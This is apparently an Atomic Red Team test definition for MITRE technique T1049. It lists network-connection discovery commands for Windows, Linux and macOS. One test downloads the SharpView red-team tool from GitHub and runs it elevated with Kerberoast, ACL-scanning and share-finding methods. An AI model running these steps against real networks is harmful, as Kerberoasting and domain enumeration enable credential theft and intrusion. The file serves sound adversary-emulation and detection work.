atomic-red-team/atomics/T1049/T1049.yaml

attack_technique: T1049
display_name: System Network Connections Discovery
atomic_tests:
- name: System Network Connections Discovery
  auto_generated_guid: 0940a971-809a-48f1-9c4d-b1d785e96ee5
  description: |
    Get a listing of network connections.

    Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.
  supported_platforms:
  - windows
  executor:
    command: |
      netstat
      net use
      net sessions
    name: command_prompt
- name: System Network Connections Discovery with PowerShell
  auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a
  description: |
    Get a listing of network connections.

    Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
  supported_platforms:
  - windows
  executor:
    command: |
      Get-NetTCPConnection
    name: powershell
- name: System Network Connections Discovery FreeBSD, Linux & MacOS
  auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
  description: |
    Get a listing of network connections.

    Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
  supported_platforms:
  - linux
  - macos
  dependency_executor_name: sh
  dependencies:
  - description: |
      Check if netstat command exists on the machine
    prereq_command: |
      if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi;
    get_prereq_command: |
      echo "Install netstat on the machine."; exit 1;
  executor:
    command: |
      netstat
      who -a
    name: sh

- name: System Discovery using SharpView
  auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9
  description: |
    Get a listing of network connections, domains, domain users, and etc.  
    sharpview.exe located in the bin folder, an opensource red-team tool.
    Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
  supported_platforms:
  - windows
  input_arguments:
    SharpView_url:
      description: sharpview download URL
      type: url
      default: https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true
    SharpView:
      description: Path of the executable opensource redteam tool used for the performing this atomic.
      type: path
      default: PathToAtomicsFolder\..\ExternalPayloads\SharpView.exe
    syntax:
      description: Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc.
      type: string
      default: |
        "Invoke-ACLScanner", "Invoke-Kerberoast", "Find-DomainShare" 
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Sharpview.exe must exist on disk at specified location (#{SharpView})
    prereq_command: |
      if (Test-Path "#{SharpView}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{SharpView}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"
  executor:
    name: powershell
    elevation_required: true
    command: |
      $syntaxList = #{syntax}
      foreach ($syntax in $syntaxList) {
      #{SharpView} $syntax -}